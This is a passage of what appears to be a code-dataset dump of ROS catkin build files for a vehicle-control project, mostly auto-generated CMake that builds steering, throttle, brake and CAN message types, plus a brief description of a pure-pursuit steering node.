"text": "\nnode name : pure_pursuit\n\nsubscribed topics:\n gps_waypointsm, type is : zf_msgs::pose2dArray\n pos320_pose, type is : zf_msgs::pos320\n\npublished topics:\n pure_pursuit_steer, type is : std_msgs::int32\n \n"
},
{
"alpha_fraction": 0.7704517841339111,
"alphanum_fraction": 0.7997558116912842,
"avg_line_length": 57.5,
"blob_id": "092e5f0a2717ab445f9a22a4c2e6af593bf954f3",
"content_id": "fb08104d095ece5cd3cba21eead6e42193b40dfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 819,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 14,
"path": "/build/zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zfmsg_generate_messages_lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/BreakStatus.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/SteerStatus.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/ThrottleGearStatus.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/MotionCmd.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/CanInfo.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/CanInfoAW.lisp\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zfmsg_generate_messages_lisp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7786259651184082,
"alphanum_fraction": 0.7786259651184082,
"avg_line_length": 31.75,
"blob_id": "6bcc01a1084d7632f80979e55e6d002b971c9865",
"content_id": "5e72667287f189f5b7a2fc26c72c7df625032902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 4,
"path": "/devel/share/path/cmake/path-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(path_MSG_INCLUDE_DIRS \"\")\nset(path_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7525020837783813,
"alphanum_fraction": 0.7662519812583923,
"avg_line_length": 44.01473617553711,
"blob_id": "b1afa0bdb6ce0d4f20ee987206e8b0dc43e7804d",
"content_id": "50c16fe5dfdd1b95606fcd6823a24393e076118e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 21382,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 475,
"path": "/build/zfmsg/cmake/zfmsg-genmsg.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(STATUS \"zfmsg: 6 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Izfmsg:/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg;-Istd_msgs:/opt/ros/kinetic/share/std_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(zfmsg_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" \"std_msgs/Header\"\n)\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n 
${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_gencpp)\nadd_dependencies(zfmsg_gencpp zfmsg_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n 
\"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_geneus)\nadd_dependencies(zfmsg_geneus zfmsg_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n 
\"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_genlisp)\nadd_dependencies(zfmsg_genlisp zfmsg_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n 
${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_gennodejs)\nadd_dependencies(zfmsg_gennodejs zfmsg_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n 
\"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_py)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_genpy)\nadd_dependencies(zfmsg_genpy zfmsg_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(zfmsg_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(zfmsg_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(zfmsg_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS 
